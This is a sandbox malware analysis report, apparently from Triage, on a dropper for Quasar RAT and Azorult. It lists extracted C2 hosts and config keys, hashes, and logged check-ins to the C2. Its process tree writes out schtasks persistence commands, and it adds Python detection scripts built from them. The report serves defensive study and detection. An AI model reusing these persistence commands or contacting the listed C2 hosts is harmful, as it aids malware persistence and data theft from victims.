Analysis

  • max time kernel
    3s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/01/2025, 03:05 UTC

General

  • Target

    5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe

  • Size

    2.0MB

  • MD5

    991fbae4fb220876924d5398a8252a60

  • SHA1

    e98704697dc895376a7a77ed5eca8a84cd312a62

  • SHA256

    5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fb

  • SHA512

    c89c7aba766d9349ad7f8006583fc52f173819ef8b40d1384123ef8816c810c9cae4f956e23857c38823f0faa8033b42effc53ac9ff8718e0523e266329de86b

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYr:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YJ

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 13 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe
    "C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
          PID:2920
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 180
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:2744
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:692
        • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2436
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2972
      • C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe
        "C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2812
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
        2⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2768
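
The process tree above shows the sample's persistence in full: three `schtasks /create` calls, two of them registering an ONLOGON task with `/rl HIGHEST` whose action points into the user profile, and one re-executing a binary every minute under the vendor-sounding name RtkAudioService64. The following is an added detection example, not code from the Triage report: the three malicious command lines are copied from the tree, the benign control row is constructed, and the `(pid, image, command line)` tuple format is an assumed stand-in for whatever process-creation telemetry you actually collect (Sysmon event 1, EDR, etc.).

```python
"""Flag schtasks persistence from process-creation command lines.

Added example, not part of the Triage report: the schtasks command lines in
SAMPLE_EVENTS are copied from the process tree above, the benign control row
is constructed, and the (pid, image, command line) format is an assumed
stand-in for real process-creation telemetry.
"""
import re
from dataclasses import dataclass

# Anything under C:\Users is writable by the logged-on user; a task whose
# action lives there was not put in place by an installer running as SYSTEM.
USER_WRITABLE_MARKER = "\\users\\"

# schtasks switches that take a value; every other switch is a bare flag.
VALUE_SWITCHES = {"/tn", "/tr", "/sc", "/mo", "/rl", "/ru", "/rp", "/st", "/sd", "/xml"}

SAMPLE_EVENTS = [
    # From the report: windef.exe registers itself to run elevated at logon.
    (692, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f'),
    # From the report: the installed copy re-registers the task pointing at itself.
    (2972, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f'),
    # From the report: a once-a-minute task with a vendor-sounding name.
    (2768, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F'),
    # Constructed benign control: a daily updater living under Program Files.
    (4100, r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /tn "Vendor Update" /sc DAILY /tr "C:\Program Files\Vendor\update.exe" /f'),
]


@dataclass
class Finding:
    pid: int
    task_name: str
    action: str
    reasons: list


def tokenize(cmdline):
    """Split a Windows command line: quoted tokens keep their spaces, no escapes."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline):
    """Return {switch: value-or-True} for a 'schtasks /create' line, else None."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower().rsplit("\\", 1)[-1] not in ("schtasks", "schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(toks):
        sw = toks[i].lower()
        if sw in VALUE_SWITCHES and i + 1 < len(toks):
            opts[sw] = toks[i + 1]
            i += 2
        else:
            opts[sw] = True
            i += 1
    return opts if "/create" in opts else None


def analyze(pid, image, cmdline):
    """Return a Finding for a suspicious task registration, else None."""
    opts = parse_schtasks(cmdline)
    if opts is None:
        return None
    action = str(opts.get("/tr", ""))
    sched = str(opts.get("/sc", "")).upper()
    reasons = []
    if USER_WRITABLE_MARKER in action.lower():
        reasons.append("action binary lives in a user-writable directory")
    if sched in ("ONLOGON", "ONSTART") and str(opts.get("/rl", "")).upper() == "HIGHEST":
        reasons.append(f"runs with highest privileges at {sched}")
    if sched == "MINUTE":
        # /mo is the interval; absent means every minute. Short intervals are
        # a watchdog pattern, not a maintenance schedule.
        mo = str(opts.get("/mo", "1"))
        every = int(mo) if mo.isdigit() else 1
        if every <= 5:
            reasons.append(f"re-executes every {every} minute(s)")
    if not reasons:
        return None
    return Finding(pid, str(opts.get("/tn", "")), action, reasons)


def scan(events):
    """Run analyze() over (pid, image, cmdline) records; return the findings."""
    return [f for f in (analyze(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"PID {f.pid}: task {f.task_name!r} -> {f.action}")
        for r in f.reasons:
            print("   -", r)
```

On real telemetry the user-writable check should be widened to whatever directories your users can write to (ProgramData subfolders, removable media), and the task name (`win defender run`, `RtkAudioService64`) is worth a separate rule for names that impersonate security or vendor components.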

    Network

    • DNS (US)
      ip-api.com
      windef.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • GET (US)
      http://ip-api.com/json/
      windef.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 24 Jan 2025 03:05:34 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 291
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • GET (US)
      http://ip-api.com/json/
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 24 Jan 2025 03:05:35 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 291
      Access-Control-Allow-Origin: *
      X-Ttl: 58
      X-Rl: 43
    • DNS (US)
      0x21.in
      Remote address:
      8.8.8.8:53
      Request
      0x21.in
      IN A
      Response
      0x21.in
      IN A
      44.221.84.105
    • POST (US)
      http://0x21.in:8000/_az/
      Remote address:
      44.221.84.105:8000
      Request
      POST /_az/ HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: 0x21.in:8000
      Content-Length: 107
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Jan 2025 03:05:36 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=e3bfa89758683bf1ecae9cf253d691f9|181.215.176.83|1737687936|1737687936|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    • DNS (US)
      0x21.in
      Remote address:
      8.8.8.8:53
      Request
      0x21.in
      IN A
      Response
      0x21.in
      IN A
      44.221.84.105
    • POST (US)
      http://0x21.in/_az/
      Remote address:
      44.221.84.105:8000
      Request
      POST /_az/ HTTP/1.0
      Host: 0x21.in
      Connection: close
      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Content-Length: 107
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Jan 2025 03:05:36 GMT
      Content-Type: text/html
      Connection: close
      Set-Cookie: btst=58ca5876a8d8dc8884c6639246dd2755|181.215.176.83|1737687936|1737687936|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Flows (Sent/Received are bytes, Pkts are packet counts; a blank cell means the field was not reported for that flow)

    Destination        | Domain / URL             | Proto | Process    | Sent  | Received | Pkts sent | Pkts recv | Request                       | Response
    -------------------|--------------------------|-------|------------|-------|----------|-----------|-----------|-------------------------------|--------------
    208.95.112.1:80    | http://ip-api.com/json/  | http  | windef.exe | 328 B | 560 B    | 4         | 2         | GET http://ip-api.com/json/   | 200
    208.95.112.1:80    | http://ip-api.com/json/  | http  |            | 374 B | 560 B    | 5         | 2         | GET http://ip-api.com/json/   | 200
    44.221.84.105:8000 | http://0x21.in:8000/_az/ | http  |            | 491 B | 870 B    | 5         | 5         | POST http://0x21.in:8000/_az/ | 200
    5.8.88.191:443     |                          |       |            | 152 B |          | 3         |           |                               |
    44.221.84.105:8000 | http://0x21.in/_az/      | http  |            | 480 B | 590 B    | 5         | 5         | POST http://0x21.in/_az/      | 200
    8.8.8.8:53         | ip-api.com               | dns   | windef.exe | 56 B  | 72 B     | 1         | 1         | DNS ip-api.com                | 208.95.112.1
    8.8.8.8:53         | 0x21.in                  | dns   |            | 53 B  | 69 B     | 1         | 1         | DNS 0x21.in                   | 44.221.84.105
    8.8.8.8:53         | 0x21.in                  | dns   |            | 53 B  | 69 B     | 1         | 1         | DNS 0x21.in                   | 44.221.84.105
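
The network records above carry several artefacts worth turning into rules: windef.exe queries ip-api.com with a hardcoded Firefox 48 user agent that claims Windows NT 6.3 (Windows 8.1) even though the sandbox platform is Windows 7 (NT 6.1); the Azorult check-ins POST to port 8000 (and once over HTTP/1.0) with an "MSIE 6.0b; Windows NT 5.1" user agent; and the Quasar C2 5.8.88.191:443 from the extracted config receives 3 packets with nothing coming back. The following is an added triage example, not code from the Triage report: the records are constructed from the requests and flows listed above, the benign control record is invented, and the dictionary field names are an assumed stand-in for whatever proxy or EDR network telemetry you have.

```python
"""Triage HTTP/flow records against the behaviours shown in this report.

Added example, not part of the Triage report: SAMPLE_RECORDS are constructed
from the requests and flows listed above plus one invented benign control;
the field names are an assumed stand-in for real network telemetry.
"""
import re
from urllib.parse import urlsplit

# The sandbox platform was windows7_x64; Windows 7 identifies itself as NT 6.1.
HOST_NT_VERSION = "6.1"
NT_NAMES = {"5.1": "Windows XP", "6.1": "Windows 7", "6.3": "Windows 8.1", "10.0": "Windows 10/11"}

# Destinations taken from the sample's extracted Quasar and Azorult configs.
CONFIG_C2 = {"5.8.88.191", "sockartek.icu", "0x21.in"}
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "icanhazip.com", "ifconfig.me", "ipinfo.io"}
BROWSERS = {"firefox.exe", "chrome.exe", "iexplore.exe", "msedge.exe"}

SAMPLE_RECORDS = [
    # From the report: the Quasar dropper asks ip-api.com for the public IP.
    {"process": "windef.exe", "method": "GET", "url": "http://ip-api.com/json/", "version": "HTTP/1.1",
     "user_agent": "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0",
     "dst": "208.95.112.1:80"},
    # From the report: Azorult check-in on a non-standard port with an IE 6 beta UA.
    {"process": None, "method": "POST", "url": "http://0x21.in:8000/_az/", "version": "HTTP/1.1",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "dst": "44.221.84.105:8000"},
    {"process": None, "method": "POST", "url": "http://0x21.in/_az/", "version": "HTTP/1.0",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "dst": "44.221.84.105:8000"},
    # From the report: Quasar C2 attempt, TCP only, no HTTP layer.
    {"process": None, "method": None, "url": None, "version": None, "user_agent": None,
     "dst": "5.8.88.191:443"},
    # Constructed benign control: a browser whose UA matches the host OS (TEST-NET address).
    {"process": "firefox.exe", "method": "GET", "url": "https://www.example.com/", "version": "HTTP/1.1",
     "user_agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0",
     "dst": "203.0.113.10:443"},
]


def inspect(rec):
    """Return the list of reasons a record is suspicious (empty if none)."""
    reasons = []
    dst_host = rec["dst"].rsplit(":", 1)[0]
    u = urlsplit(rec["url"]) if rec["url"] else None
    # Config-derived IOCs match on either the HTTP Host or the raw destination IP.
    hit = next((h for h in (u.hostname if u else None, dst_host) if h in CONFIG_C2), None)
    if hit:
        reasons.append(f"destination {hit} is a C2 from the extracted config")
    if u is None:
        return reasons  # raw flow, nothing at the HTTP layer to inspect

    port = u.port or (443 if u.scheme == "https" else 80)
    if u.hostname in IP_LOOKUP_HOSTS:
        reasons.append(f"external IP lookup via {u.hostname}")
    if rec["process"] and rec["process"].lower() not in BROWSERS:
        reasons.append(f"HTTP from non-browser process {rec['process']}")

    ua = rec["user_agent"] or ""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m and m.group(1) != HOST_NT_VERSION:
        claimed = NT_NAMES.get(m.group(1), "NT " + m.group(1))
        reasons.append(f"user agent claims {claimed} (NT {m.group(1)}), "
                       f"host is {NT_NAMES[HOST_NT_VERSION]} (NT {HOST_NT_VERSION})")
    if "MSIE 6" in ua:
        reasons.append("legacy MSIE 6 user agent")
    if rec["method"] == "POST" and port not in (80, 443):
        reasons.append(f"POST to non-standard port {port}")
    if rec["method"] == "POST" and rec["version"] == "HTTP/1.0":
        reasons.append("HTTP/1.0 POST (hand-rolled client, not a browser)")
    return reasons


def triage(records):
    """Return (dst, reasons) for every record that raised at least one reason."""
    out = []
    for rec in records:
        reasons = inspect(rec)
        if reasons:
            out.append((rec["dst"], reasons))
    return out


if __name__ == "__main__":
    for dst, reasons in triage(SAMPLE_RECORDS):
        print(dst)
        for r in reasons:
            print("   -", r)
```

The OS-string comparison is the rule most likely to survive a rebuild of the sample: a real browser reports the host's own NT version, while a hardcoded user agent string keeps claiming whatever Windows the author copied it from.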

    MITRE ATT&CK Enterprise v15

    Downloads

    • \Users\Admin\AppData\Local\Temp\vnc.exe

      Filesize

      405KB

      MD5

      b8ba87ee4c3fc085a2fed0d839aadce1

      SHA1

      b3a2e3256406330e8b1779199bb2b9865122d766

      SHA256

      4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

      SHA512

      7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

    • \Users\Admin\AppData\Local\Temp\windef.exe

      Filesize

      349KB

      MD5

      b4a202e03d4135484d0e730173abcc72

      SHA1

      01b30014545ea526c15a60931d676f9392ea0c70

      SHA256

      7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

      SHA512

      632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

    • memory/1740-41-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

      Filesize

      4KB

    • memory/1740-61-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

      Filesize

      4KB

    • memory/2436-57-0x0000000000130000-0x000000000018E000-memory.dmp

      Filesize

      376KB

    • memory/2448-45-0x00000000012C0000-0x000000000131E000-memory.dmp

      Filesize

      376KB

    • memory/2812-39-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/2812-35-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/2812-29-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/2812-28-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB
